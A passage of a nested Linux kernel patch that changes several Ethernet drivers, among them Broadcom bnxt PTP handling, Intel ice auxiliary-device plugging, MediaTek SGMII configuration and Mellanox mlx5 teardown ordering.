+@@ -3565,9 +3576,6 @@ static int mv88e6xxx_change_mtu(struct dsa_switch *ds, int port, int new_mtu)
+ 		ret = chip->info->ops->port_set_jumbo_size(chip, port, new_mtu);
+ 	else if (chip->info->ops->set_max_frame_size)
+ 		ret = chip->info->ops->set_max_frame_size(chip, new_mtu);
+-	else
+-		if (new_mtu > 1522)
+-			ret = -EINVAL;
+ 	mv88e6xxx_reg_unlock(chip);
+ 
+ 	return ret;
+diff --git a/drivers/net/ethernet/aquantia/atlantic/aq_ring.c b/drivers/net/ethernet/aquantia/atlantic/aq_ring.c
+index 1e8d902e1c8ea..7f933175cbdac 100644
+--- a/drivers/net/ethernet/aquantia/atlantic/aq_ring.c
++++ b/drivers/net/ethernet/aquantia/atlantic/aq_ring.c
+@@ -412,6 +412,25 @@ int aq_xdp_xmit(struct net_device *dev, int num_frames,
+ 	return num_frames - drop;
+ }
+ 
++static struct sk_buff *aq_xdp_build_skb(struct xdp_buff *xdp,
++					struct net_device *dev,
++					struct aq_ring_buff_s *buff)
++{
++	struct xdp_frame *xdpf;
++	struct sk_buff *skb;
++
++	xdpf = xdp_convert_buff_to_frame(xdp);
++	if (unlikely(!xdpf))
++		return NULL;
++
++	skb = xdp_build_skb_from_frame(xdpf, dev);
++	if (!skb)
++		return NULL;
++
++	aq_get_rxpages_xdp(buff, xdp);
++	return skb;
++}
++
+ static struct sk_buff *aq_xdp_run_prog(struct aq_nic_s *aq_nic,
+ 				       struct xdp_buff *xdp,
+ 				       struct aq_ring_s *rx_ring,
+@@ -431,7 +450,7 @@ static struct sk_buff *aq_xdp_run_prog(struct aq_nic_s *aq_nic,
+ 
+ 	prog = READ_ONCE(rx_ring->xdp_prog);
+ 	if (!prog)
+-		goto pass;
++		return aq_xdp_build_skb(xdp, aq_nic->ndev, buff);
+ 
+ 	prefetchw(xdp->data_hard_start); /* xdp_frame write */
+ 
+@@ -442,17 +461,12 @@ static struct sk_buff *aq_xdp_run_prog(struct aq_nic_s *aq_nic,
+ 	act = bpf_prog_run_xdp(prog, xdp);
+ 	switch (act) {
+ 	case XDP_PASS:
+-pass:
+-		xdpf = xdp_convert_buff_to_frame(xdp);
+-		if (unlikely(!xdpf))
+-			goto out_aborted;
+-		skb = xdp_build_skb_from_frame(xdpf, aq_nic->ndev);
++		skb = aq_xdp_build_skb(xdp, aq_nic->ndev, buff);
+ 		if (!skb)
+ 			goto out_aborted;
+ 		u64_stats_update_begin(&rx_ring->stats.rx.syncp);
+ 		++rx_ring->stats.rx.xdp_pass;
+ 		u64_stats_update_end(&rx_ring->stats.rx.syncp);
+-		aq_get_rxpages_xdp(buff, xdp);
+ 		return skb;
+ 	case XDP_TX:
+ 		xdpf = xdp_convert_buff_to_frame(xdp);
+diff --git a/drivers/net/ethernet/broadcom/bnxt/bnxt.c b/drivers/net/ethernet/broadcom/bnxt/bnxt.c
+index 25d1642c10c3b..b44b2ec5e61a2 100644
+--- a/drivers/net/ethernet/broadcom/bnxt/bnxt.c
++++ b/drivers/net/ethernet/broadcom/bnxt/bnxt.c
+@@ -6991,11 +6991,9 @@ static int bnxt_hwrm_func_qcfg(struct bnxt *bp)
+ 		if (flags & FUNC_QCFG_RESP_FLAGS_FW_DCBX_AGENT_ENABLED)
+ 			bp->fw_cap |= BNXT_FW_CAP_DCBX_AGENT;
+ 	}
+-	if (BNXT_PF(bp) && (flags & FUNC_QCFG_RESP_FLAGS_MULTI_HOST)) {
++	if (BNXT_PF(bp) && (flags & FUNC_QCFG_RESP_FLAGS_MULTI_HOST))
+ 		bp->flags |= BNXT_FLAG_MULTI_HOST;
+-		if (bp->fw_cap & BNXT_FW_CAP_PTP_RTC)
+-			bp->fw_cap &= ~BNXT_FW_CAP_PTP_RTC;
+-	}
++
+ 	if (flags & FUNC_QCFG_RESP_FLAGS_RING_MONITOR_ENABLED)
+ 		bp->fw_cap |= BNXT_FW_CAP_RING_MONITOR;
+ 
+diff --git a/drivers/net/ethernet/broadcom/bnxt/bnxt.h b/drivers/net/ethernet/broadcom/bnxt/bnxt.h
+index 5163ef4a49ea3..56355e64815e2 100644
+--- a/drivers/net/ethernet/broadcom/bnxt/bnxt.h
++++ b/drivers/net/ethernet/broadcom/bnxt/bnxt.h
+@@ -1992,6 +1992,8 @@ struct bnxt {
+ 	u32			fw_dbg_cap;
+ 
+ #define BNXT_NEW_RM(bp)		((bp)->fw_cap & BNXT_FW_CAP_NEW_RM)
++#define BNXT_PTP_USE_RTC(bp)	(!BNXT_MH(bp) && \
++				 ((bp)->fw_cap & BNXT_FW_CAP_PTP_RTC))
+ 	u32			hwrm_spec_code;
+ 	u16			hwrm_cmd_seq;
+ 	u16                     hwrm_cmd_kong_seq;
+diff --git a/drivers/net/ethernet/broadcom/bnxt/bnxt_ptp.c b/drivers/net/ethernet/broadcom/bnxt/bnxt_ptp.c
+index 4ec8bba18cdd2..a3a3978a4d1c2 100644
+--- a/drivers/net/ethernet/broadcom/bnxt/bnxt_ptp.c
++++ b/drivers/net/ethernet/broadcom/bnxt/bnxt_ptp.c
+@@ -63,7 +63,7 @@ static int bnxt_ptp_settime(struct ptp_clock_info *ptp_info,
+ 						ptp_info);
+ 	u64 ns = timespec64_to_ns(ts);
+ 
+-	if (ptp->bp->fw_cap & BNXT_FW_CAP_PTP_RTC)
++	if (BNXT_PTP_USE_RTC(ptp->bp))
+ 		return bnxt_ptp_cfg_settime(ptp->bp, ns);
+ 
+ 	spin_lock_bh(&ptp->ptp_lock);
+@@ -196,7 +196,7 @@ static int bnxt_ptp_adjtime(struct ptp_clock_info *ptp_info, s64 delta)
+ 	struct bnxt_ptp_cfg *ptp = container_of(ptp_info, struct bnxt_ptp_cfg,
+ 						ptp_info);
+ 
+-	if (ptp->bp->fw_cap & BNXT_FW_CAP_PTP_RTC)
++	if (BNXT_PTP_USE_RTC(ptp->bp))
+ 		return bnxt_ptp_adjphc(ptp, delta);
+ 
+ 	spin_lock_bh(&ptp->ptp_lock);
+@@ -205,34 +205,39 @@ static int bnxt_ptp_adjtime(struct ptp_clock_info *ptp_info, s64 delta)
+ 	return 0;
+ }
+ 
++static int bnxt_ptp_adjfine_rtc(struct bnxt *bp, long scaled_ppm)
++{
++	s32 ppb = scaled_ppm_to_ppb(scaled_ppm);
++	struct hwrm_port_mac_cfg_input *req;
++	int rc;
++
++	rc = hwrm_req_init(bp, req, HWRM_PORT_MAC_CFG);
++	if (rc)
++		return rc;
++
++	req->ptp_freq_adj_ppb = cpu_to_le32(ppb);
++	req->enables = cpu_to_le32(PORT_MAC_CFG_REQ_ENABLES_PTP_FREQ_ADJ_PPB);
++	rc = hwrm_req_send(bp, req);
++	if (rc)
++		netdev_err(bp->dev,
++			   "ptp adjfine failed. rc = %d\n", rc);
++	return rc;
++}
++
+ static int bnxt_ptp_adjfine(struct ptp_clock_info *ptp_info, long scaled_ppm)
+ {
+ 	struct bnxt_ptp_cfg *ptp = container_of(ptp_info, struct bnxt_ptp_cfg,
+ 						ptp_info);
+-	struct hwrm_port_mac_cfg_input *req;
+ 	struct bnxt *bp = ptp->bp;
+-	int rc = 0;
+ 
+-	if (!(ptp->bp->fw_cap & BNXT_FW_CAP_PTP_RTC)) {
+-		spin_lock_bh(&ptp->ptp_lock);
+-		timecounter_read(&ptp->tc);
+-		ptp->cc.mult = adjust_by_scaled_ppm(ptp->cmult, scaled_ppm);
+-		spin_unlock_bh(&ptp->ptp_lock);
+-	} else {
+-		s32 ppb = scaled_ppm_to_ppb(scaled_ppm);
+-
+-		rc = hwrm_req_init(bp, req, HWRM_PORT_MAC_CFG);
+-		if (rc)
+-			return rc;
++	if (BNXT_PTP_USE_RTC(bp))
++		return bnxt_ptp_adjfine_rtc(bp, scaled_ppm);
+ 
+-		req->ptp_freq_adj_ppb = cpu_to_le32(ppb);
+-		req->enables = cpu_to_le32(PORT_MAC_CFG_REQ_ENABLES_PTP_FREQ_ADJ_PPB);
+-		rc = hwrm_req_send(ptp->bp, req);
+-		if (rc)
+-			netdev_err(ptp->bp->dev,
+-				   "ptp adjfine failed. rc = %d\n", rc);
+-	}
+-	return rc;
++	spin_lock_bh(&ptp->ptp_lock);
++	timecounter_read(&ptp->tc);
++	ptp->cc.mult = adjust_by_scaled_ppm(ptp->cmult, scaled_ppm);
++	spin_unlock_bh(&ptp->ptp_lock);
++	return 0;
+ }
+ 
+ void bnxt_ptp_pps_event(struct bnxt *bp, u32 data1, u32 data2)
+@@ -879,7 +884,7 @@ int bnxt_ptp_init_rtc(struct bnxt *bp, bool phc_cfg)
+ 	u64 ns;
+ 	int rc;
+ 
+-	if (!bp->ptp_cfg || !(bp->fw_cap & BNXT_FW_CAP_PTP_RTC))
++	if (!bp->ptp_cfg || !BNXT_PTP_USE_RTC(bp))
+ 		return -ENODEV;
+ 
+ 	if (!phc_cfg) {
+@@ -932,13 +937,14 @@ int bnxt_ptp_init(struct bnxt *bp, bool phc_cfg)
+ 	atomic_set(&ptp->tx_avail, BNXT_MAX_TX_TS);
+ 	spin_lock_init(&ptp->ptp_lock);
+ 
+-	if (bp->fw_cap & BNXT_FW_CAP_PTP_RTC) {
++	if (BNXT_PTP_USE_RTC(bp)) {
+ 		bnxt_ptp_timecounter_init(bp, false);
+ 		rc = bnxt_ptp_init_rtc(bp, phc_cfg);
+ 		if (rc)
+ 			goto out;
+ 	} else {
+ 		bnxt_ptp_timecounter_init(bp, true);
++		bnxt_ptp_adjfine_rtc(bp, 0);
+ 	}
+ 
+ 	ptp->ptp_info = bnxt_ptp_caps;
+diff --git a/drivers/net/ethernet/i825xx/sni_82596.c b/drivers/net/ethernet/i825xx/sni_82596.c
+index daec9ce04531b..54bb4d9a0d1ea 100644
+--- a/drivers/net/ethernet/i825xx/sni_82596.c
++++ b/drivers/net/ethernet/i825xx/sni_82596.c
+@@ -78,6 +78,7 @@ static int sni_82596_probe(struct platform_device *dev)
+ 	void __iomem *mpu_addr;
+ 	void __iomem *ca_addr;
+ 	u8 __iomem *eth_addr;
++	u8 mac[ETH_ALEN];
+ 
+ 	res = platform_get_resource(dev, IORESOURCE_MEM, 0);
+ 	ca = platform_get_resource(dev, IORESOURCE_MEM, 1);
+@@ -109,12 +110,13 @@ static int sni_82596_probe(struct platform_device *dev)
+ 		goto probe_failed;
+ 
+ 	/* someone seems to like messed up stuff */
+-	netdevice->dev_addr[0] = readb(eth_addr + 0x0b);
+-	netdevice->dev_addr[1] = readb(eth_addr + 0x0a);
+-	netdevice->dev_addr[2] = readb(eth_addr + 0x09);
+-	netdevice->dev_addr[3] = readb(eth_addr + 0x08);
+-	netdevice->dev_addr[4] = readb(eth_addr + 0x07);
+-	netdevice->dev_addr[5] = readb(eth_addr + 0x06);
++	mac[0] = readb(eth_addr + 0x0b);
++	mac[1] = readb(eth_addr + 0x0a);
++	mac[2] = readb(eth_addr + 0x09);
++	mac[3] = readb(eth_addr + 0x08);
++	mac[4] = readb(eth_addr + 0x07);
++	mac[5] = readb(eth_addr + 0x06);
++	eth_hw_addr_set(netdevice, mac);
+ 	iounmap(eth_addr);
+ 
+ 	if (netdevice->irq < 0) {
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_main.c b/drivers/net/ethernet/intel/i40e/i40e_main.c
+index 52eec0a50492b..8328139db3795 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_main.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_main.c
+@@ -15518,6 +15518,7 @@ static int i40e_init_recovery_mode(struct i40e_pf *pf, struct i40e_hw *hw)
+ 	int err;
+ 	int v_idx;
+ 
++	pci_set_drvdata(pf->pdev, pf);
+ 	pci_save_state(pf->pdev);
+ 
+ 	/* set up periodic task facility */
+diff --git a/drivers/net/ethernet/intel/ice/ice.h b/drivers/net/ethernet/intel/ice/ice.h
+index 713069f809ec4..3cad5e6b2ad18 100644
+--- a/drivers/net/ethernet/intel/ice/ice.h
++++ b/drivers/net/ethernet/intel/ice/ice.h
+@@ -506,6 +506,7 @@ enum ice_pf_flags {
+ 	ICE_FLAG_VF_VLAN_PRUNING,
+ 	ICE_FLAG_LINK_LENIENT_MODE_ENA,
+ 	ICE_FLAG_PLUG_AUX_DEV,
++	ICE_FLAG_UNPLUG_AUX_DEV,
+ 	ICE_FLAG_MTU_CHANGED,
+ 	ICE_FLAG_GNSS,			/* GNSS successfully initialized */
+ 	ICE_PF_FLAGS_NBITS		/* must be last */
+@@ -950,16 +951,11 @@ static inline void ice_set_rdma_cap(struct ice_pf *pf)
+  */
+ static inline void ice_clear_rdma_cap(struct ice_pf *pf)
+ {
+-	/* We can directly unplug aux device here only if the flag bit
+-	 * ICE_FLAG_PLUG_AUX_DEV is not set because ice_unplug_aux_dev()
+-	 * could race with ice_plug_aux_dev() called from
+-	 * ice_service_task(). In this case we only clear that bit now and
+-	 * aux device will be unplugged later once ice_plug_aux_device()
+-	 * called from ice_service_task() finishes (see ice_service_task()).
++	/* defer unplug to service task to avoid RTNL lock and
++	 * clear PLUG bit so that pending plugs don't interfere
+ 	 */
+-	if (!test_and_clear_bit(ICE_FLAG_PLUG_AUX_DEV, pf->flags))
+-		ice_unplug_aux_dev(pf);
+-
++	clear_bit(ICE_FLAG_PLUG_AUX_DEV, pf->flags);
++	set_bit(ICE_FLAG_UNPLUG_AUX_DEV, pf->flags);
+ 	clear_bit(ICE_FLAG_RDMA_ENA, pf->flags);
+ }
+ #endif /* _ICE_H_ */
+diff --git a/drivers/net/ethernet/intel/ice/ice_main.c b/drivers/net/ethernet/intel/ice/ice_main.c
+index 3811462824390..56155a04cc0c8 100644
+--- a/drivers/net/ethernet/intel/ice/ice_main.c
++++ b/drivers/net/ethernet/intel/ice/ice_main.c
+@@ -2316,18 +2316,15 @@ static void ice_service_task(struct work_struct *work)
+ 		}
+ 	}
+ 
+-	if (test_bit(ICE_FLAG_PLUG_AUX_DEV, pf->flags)) {
+-		/* Plug aux device per request */
+-		ice_plug_aux_dev(pf);
++	/* unplug aux dev per request, if an unplug request came in
++	 * while processing a plug request, this will handle it
++	 */
++	if (test_and_clear_bit(ICE_FLAG_UNPLUG_AUX_DEV, pf->flags))
++		ice_unplug_aux_dev(pf);
+ 
+-		/* Mark plugging as done but check whether unplug was
+-		 * requested during ice_plug_aux_dev() call
+-		 * (e.g. from ice_clear_rdma_cap()) and if so then
+-		 * plug aux device.
+-		 */
+-		if (!test_and_clear_bit(ICE_FLAG_PLUG_AUX_DEV, pf->flags))
+-			ice_unplug_aux_dev(pf);
+-	}
++	/* Plug aux device per request */
++	if (test_and_clear_bit(ICE_FLAG_PLUG_AUX_DEV, pf->flags))
++		ice_plug_aux_dev(pf);
+ 
+ 	if (test_and_clear_bit(ICE_FLAG_MTU_CHANGED, pf->flags)) {
+ 		struct iidc_event *event;
+diff --git a/drivers/net/ethernet/intel/ice/ice_xsk.c b/drivers/net/ethernet/intel/ice/ice_xsk.c
+index 374b7f10b549b..76b8ac3462266 100644
+--- a/drivers/net/ethernet/intel/ice/ice_xsk.c
++++ b/drivers/net/ethernet/intel/ice/ice_xsk.c
+@@ -184,8 +184,6 @@ static int ice_qp_dis(struct ice_vsi *vsi, u16 q_idx)
+ 	}
+ 	netif_tx_stop_queue(netdev_get_tx_queue(vsi->netdev, q_idx));
+ 
+-	ice_qvec_dis_irq(vsi, rx_ring, q_vector);
+-
+ 	ice_fill_txq_meta(vsi, tx_ring, &txq_meta);
+ 	err = ice_vsi_stop_tx_ring(vsi, ICE_NO_RESET, 0, tx_ring, &txq_meta);
+ 	if (err)
+@@ -200,10 +198,11 @@ static int ice_qp_dis(struct ice_vsi *vsi, u16 q_idx)
+ 		if (err)
+ 			return err;
+ 	}
++	ice_qvec_dis_irq(vsi, rx_ring, q_vector);
++
+ 	err = ice_vsi_ctrl_one_rx_ring(vsi, false, q_idx, true);
+ 	if (err)
+ 		return err;
+-	ice_clean_rx_ring(rx_ring);
+ 
+ 	ice_qvec_toggle_napi(vsi, q_vector, false);
+ 	ice_qp_clean_rings(vsi, q_idx);
+diff --git a/drivers/net/ethernet/mediatek/mtk_eth_soc.h b/drivers/net/ethernet/mediatek/mtk_eth_soc.h
+index b481d0d46bb16..d4b4f9eaa4419 100644
+--- a/drivers/net/ethernet/mediatek/mtk_eth_soc.h
++++ b/drivers/net/ethernet/mediatek/mtk_eth_soc.h
+@@ -528,6 +528,10 @@
+ #define SGMII_SEND_AN_ERROR_EN		BIT(11)
+ #define SGMII_IF_MODE_MASK		GENMASK(5, 1)
+ 
++/* Register to reset SGMII design */
++#define SGMII_RESERVED_0	0x34
++#define SGMII_SW_RESET		BIT(0)
++
+ /* Register to set SGMII speed, ANA RG_ Control Signals III*/
+ #define SGMSYS_ANA_RG_CS3	0x2028
+ #define RG_PHY_SPEED_MASK	(BIT(2) | BIT(3))
+diff --git a/drivers/net/ethernet/mediatek/mtk_sgmii.c b/drivers/net/ethernet/mediatek/mtk_sgmii.c
+index bb00de1003ac4..83976dc868875 100644
+--- a/drivers/net/ethernet/mediatek/mtk_sgmii.c
++++ b/drivers/net/ethernet/mediatek/mtk_sgmii.c
+@@ -38,20 +38,16 @@ static int mtk_pcs_config(struct phylink_pcs *pcs, unsigned int mode,
+ 			  const unsigned long *advertising,
+ 			  bool permit_pause_to_mac)
+ {
++	bool mode_changed = false, changed, use_an;
+ 	struct mtk_pcs *mpcs = pcs_to_mtk_pcs(pcs);
+ 	unsigned int rgc3, sgm_mode, bmcr;
+ 	int advertise, link_timer;
+-	bool changed, use_an;
+ 
+ 	advertise = phylink_mii_c22_pcs_encode_advertisement(interface,
+ 							     advertising);
+ 	if (advertise < 0)
+ 		return advertise;
+ 
+-	link_timer = phylink_get_link_timer_ns(interface);
+-	if (link_timer < 0)
+-		return link_timer;
+-
+ 	/* Clearing IF_MODE_BIT0 switches the PCS to BASE-X mode, and
+ 	 * we assume that fixes it's speed at bitrate = line rate (in
+ 	 * other words, 1000Mbps or 2500Mbps).
+@@ -77,17 +73,24 @@ static int mtk_pcs_config(struct phylink_pcs *pcs, unsigned int mode,
+ 	}
+ 
+ 	if (use_an) {
+-		/* FIXME: Do we need to set AN_RESTART here? */
+-		bmcr = SGMII_AN_RESTART | SGMII_AN_ENABLE;
++		bmcr = SGMII_AN_ENABLE;
+ 	} else {
+ 		bmcr = 0;
+ 	}
+ 
+ 	if (mpcs->interface != interface) {
++		link_timer = phylink_get_link_timer_ns(interface);
++		if (link_timer < 0)
++			return link_timer;
++
+ 		/* PHYA power down */
+ 		regmap_update_bits(mpcs->regmap, SGMSYS_QPHY_PWR_STATE_CTRL,
+ 				   SGMII_PHYA_PWD, SGMII_PHYA_PWD);
+ 
++		/* Reset SGMII PCS state */
++		regmap_update_bits(mpcs->regmap, SGMII_RESERVED_0,
++				   SGMII_SW_RESET, SGMII_SW_RESET);
++
+ 		if (interface == PHY_INTERFACE_MODE_2500BASEX)
+ 			rgc3 = RG_PHY_SPEED_3_125G;
+ 		else
+@@ -97,16 +100,17 @@ static int mtk_pcs_config(struct phylink_pcs *pcs, unsigned int mode,
+ 		regmap_update_bits(mpcs->regmap, mpcs->ana_rgc3,
+ 				   RG_PHY_SPEED_3_125G, rgc3);
+ 
++		/* Setup the link timer */
++		regmap_write(mpcs->regmap, SGMSYS_PCS_LINK_TIMER, link_timer / 2 / 8);
++
+ 		mpcs->interface = interface;
++		mode_changed = true;
+ 	}
+ 
+ 	/* Update the advertisement, noting whether it has changed */
+ 	regmap_update_bits_check(mpcs->regmap, SGMSYS_PCS_ADVERTISE,
+ 				 SGMII_ADVERTISE, advertise, &changed);
+ 
+-	/* Setup the link timer and QPHY power up inside SGMIISYS */
+-	regmap_write(mpcs->regmap, SGMSYS_PCS_LINK_TIMER, link_timer / 2 / 8);
+-
+ 	/* Update the sgmsys mode register */
+ 	regmap_update_bits(mpcs->regmap, SGMSYS_SGMII_MODE,
+ 			   SGMII_REMOTE_FAULT_DIS | SGMII_SPEED_DUPLEX_AN |
+@@ -114,7 +118,7 @@ static int mtk_pcs_config(struct phylink_pcs *pcs, unsigned int mode,
+ 
+ 	/* Update the BMCR */
+ 	regmap_update_bits(mpcs->regmap, SGMSYS_PCS_CONTROL_1,
+-			   SGMII_AN_RESTART | SGMII_AN_ENABLE, bmcr);
++			   SGMII_AN_ENABLE, bmcr);
+ 
+ 	/* Release PHYA power down state
+ 	 * Only removing bit SGMII_PHYA_PWD isn't enough.
+@@ -128,7 +132,7 @@ static int mtk_pcs_config(struct phylink_pcs *pcs, unsigned int mode,
+ 	usleep_range(50, 100);
+ 	regmap_write(mpcs->regmap, SGMSYS_QPHY_PWR_STATE_CTRL, 0);
+ 
+-	return changed;
++	return changed || mode_changed;
+ }
+ 
+ static void mtk_pcs_restart_an(struct phylink_pcs *pcs)
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en.h b/drivers/net/ethernet/mellanox/mlx5/core/en.h
+index 2d77fb8a8a015..ae73c9af8f251 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en.h
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en.h
+@@ -313,7 +313,6 @@ struct mlx5e_params {
+ 		} channel;
+ 	} mqprio;
+ 	bool rx_cqe_compress_def;
+-	bool tunneled_offload_en;
+ 	struct dim_cq_moder rx_cq_moderation;
+ 	struct dim_cq_moder tx_cq_moderation;
+ 	struct mlx5e_packet_merge_param packet_merge;
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_accel/macsec.c b/drivers/net/ethernet/mellanox/mlx5/core/en_accel/macsec.c
+index 7f6b940830b31..f84f1cfcddb85 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_accel/macsec.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_accel/macsec.c
+@@ -89,8 +89,8 @@ struct mlx5e_macsec_rx_sc {
+ };
+ 
+ struct mlx5e_macsec_umr {
++	u8 __aligned(64) ctx[MLX5_ST_SZ_BYTES(macsec_aso)];
+ 	dma_addr_t dma_addr;
+-	u8 ctx[MLX5_ST_SZ_BYTES(macsec_aso)];
+ 	u32 mkey;
+ };
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_main.c b/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
+index 6c24f33a5ea5c..d6bcbc17151d7 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
+@@ -4923,8 +4923,6 @@ void mlx5e_build_nic_params(struct mlx5e_priv *priv, struct mlx5e_xsk *xsk, u16
+ 	/* TX inline */
+ 	mlx5_query_min_inline(mdev, &params->tx_min_inline_mode);
+ 
+-	params->tunneled_offload_en = mlx5_tunnel_inner_ft_supported(mdev);
+-
+ 	/* AF_XDP */
+ 	params->xsk = xsk;
+ 
+@@ -5223,7 +5221,7 @@ static int mlx5e_init_nic_rx(struct mlx5e_priv *priv)
+ 	}
+ 
+ 	features = MLX5E_RX_RES_FEATURE_PTP;
+-	if (priv->channels.params.tunneled_offload_en)
++	if (mlx5_tunnel_inner_ft_supported(mdev))
+ 		features |= MLX5E_RX_RES_FEATURE_INNER_FT;
+ 	err = mlx5e_rx_res_init(priv->rx_res, priv->mdev, features,
+ 				priv->max_nch, priv->drop_rq.rqn,
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_rep.c b/drivers/net/ethernet/mellanox/mlx5/core/en_rep.c
+index 7d90e5b728548..301a734b7c6a7 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_rep.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_rep.c
+@@ -752,7 +752,6 @@ static void mlx5e_build_rep_params(struct net_device *netdev)
+ 	mlx5e_set_rx_cq_mode_params(params, cq_period_mode);
+ 
+ 	params->mqprio.num_tc       = 1;
+-	params->tunneled_offload_en = false;
+ 	if (rep->vport != MLX5_VPORT_UPLINK)
+ 		params->vlan_strip_disable = true;
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_tc.c b/drivers/net/ethernet/mellanox/mlx5/core/en_tc.c
+index 243d5d7750beb..c209e89ba9abe 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_tc.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_tc.c
+@@ -4240,6 +4240,7 @@ int mlx5e_set_fwd_to_int_port_actions(struct mlx5e_priv *priv,
+ 
+ 	esw_attr->dest_int_port = dest_int_port;
+ 	esw_attr->dests[out_index].flags |= MLX5_ESW_DEST_CHAIN_WITH_SRC_PORT_CHANGE;
++	esw_attr->split_count = out_index;
+ 
+ 	/* Forward to root fdb for matching against the new source vport */
+ 	attr->dest_chain = 0;
+@@ -5373,6 +5374,16 @@ err_tun_mapping:
+ 
+ void mlx5e_tc_esw_cleanup(struct mlx5_rep_uplink_priv *uplink_priv)
+ {
++	struct mlx5e_rep_priv *rpriv;
++	struct mlx5_eswitch *esw;
++	struct mlx5e_priv *priv;
++
++	rpriv = container_of(uplink_priv, struct mlx5e_rep_priv, uplink_priv);
++	priv = netdev_priv(rpriv->netdev);
++	esw = priv->mdev->priv.eswitch;
++
++	mlx5e_tc_clean_fdb_peer_flows(esw);
++
+ 	mlx5e_tc_tun_cleanup(uplink_priv->encap);
+ 
+ 	mapping_destroy(uplink_priv->tunnel_enc_opts_mapping);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c b/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c
+index f3b74cb67b71c..3992bf6337ca0 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c
+@@ -726,11 +726,11 @@ mlx5_eswitch_add_fwd_rule(struct mlx5_eswitch *esw,
+ 
+ 	flow_act.action = MLX5_FLOW_CONTEXT_ACTION_FWD_DEST;
+ 	for (i = 0; i < esw_attr->split_count; i++) {
+-		if (esw_is_indir_table(esw, attr))
+-			err = esw_setup_indir_table(dest, &flow_act, esw, attr, spec, false, &i);
+-		else if (esw_is_chain_src_port_rewrite(esw, esw_attr))
+-			err = esw_setup_chain_src_port_rewrite(dest, &flow_act, esw, chains, attr,
+-							       &i);
++		if (esw_attr->dests[i].flags & MLX5_ESW_DEST_CHAIN_WITH_SRC_PORT_CHANGE)
++			/* Source port rewrite (forward to ovs internal port or statck device) isn't
++			 * supported in the rule of split action.
++			 */
++			err = -EOPNOTSUPP;
+ 		else
+ 			esw_setup_vport_dest(dest, &flow_act, esw, esw_attr, i, i, false);
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/ipoib/ipoib.c b/drivers/net/ethernet/mellanox/mlx5/core/ipoib/ipoib.c
+index 911cf4d239645..4285b31fee6c4 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/ipoib/ipoib.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/ipoib/ipoib.c
+@@ -70,7 +70,6 @@ static void mlx5i_build_nic_params(struct mlx5_core_dev *mdev,
+ 
+ 	params->packet_merge.type = MLX5E_PACKET_MERGE_NONE;
+ 	params->hard_mtu = MLX5_IB_GRH_BYTES + MLX5_IPOIB_HARD_LEN;
+-	params->tunneled_offload_en = false;
+ 
+ 	/* CQE compression is not supported for IPoIB */
+ 	params->rx_cqe_compress_def = false;
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/main.c b/drivers/net/ethernet/mellanox/mlx5/core/main.c
+index 4e1b5757528a0..f4e0431da55b4 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/main.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/main.c
+@@ -1346,8 +1346,8 @@ static void mlx5_unload(struct mlx5_core_dev *dev)
+ {
+ 	mlx5_devlink_traps_unregister(priv_to_devlink(dev));
+ 	mlx5_sf_dev_table_destroy(dev);
+-	mlx5_sriov_detach(dev);
+ 	mlx5_eswitch_disable(dev->priv.eswitch);
++	mlx5_sriov_detach(dev);
+ 	mlx5_lag_remove_mdev(dev);
+ 	mlx5_ec_cleanup(dev);
+ 	mlx5_sf_hw_table_destroy(dev);
+@@ -1768,11 +1768,11 @@ static void remove_one(struct pci_dev *pdev)
+ 	struct mlx5_core_dev *dev  = pci_get_drvdata(pdev);
+ 	struct devlink *devlink = priv_to_devlink(dev);
+ 
++	set_bit(MLX5_BREAK_FW_WAIT, &dev->intf_state);
+ 	/* mlx5_drain_fw_reset() is using devlink APIs. Hence, we must drain
+ 	 * fw_reset before unregistering the devlink.
+ 	 */
+ 	mlx5_drain_fw_reset(dev);
+-	set_bit(MLX5_BREAK_FW_WAIT, &dev->intf_state);
+ 	devlink_unregister(devlink);
+ 	mlx5_sriov_disable(pdev);
+ 	mlx5_crdump_disable(dev);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/pagealloc.c b/drivers/net/ethernet/mellanox/mlx5/core/pagealloc.c
+index 64d4e7125e9bb..95dc67fb30015 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/pagealloc.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/pagealloc.c
+@@ -82,6 +82,16 @@ static u16 func_id_to_type(struct mlx5_core_dev *dev, u16 func_id, bool ec_funct
+ 	return func_id <= mlx5_core_max_vfs(dev) ?  MLX5_VF : MLX5_SF;
+ }
+ 
++static u32 mlx5_get_ec_function(u32 function)
++{
++	return function >> 16;
++}
++
++static u32 mlx5_get_func_id(u32 function)
++{
++	return function & 0xffff;
++}
++
+ static struct rb_root *page_root_per_function(struct mlx5_core_dev *dev, u32 function)
+ {
+ 	struct rb_root *root;
+@@ -665,20 +675,22 @@ static int optimal_reclaimed_pages(void)
+ }
+ 
+ static int mlx5_reclaim_root_pages(struct mlx5_core_dev *dev,
+-				   struct rb_root *root, u16 func_id)
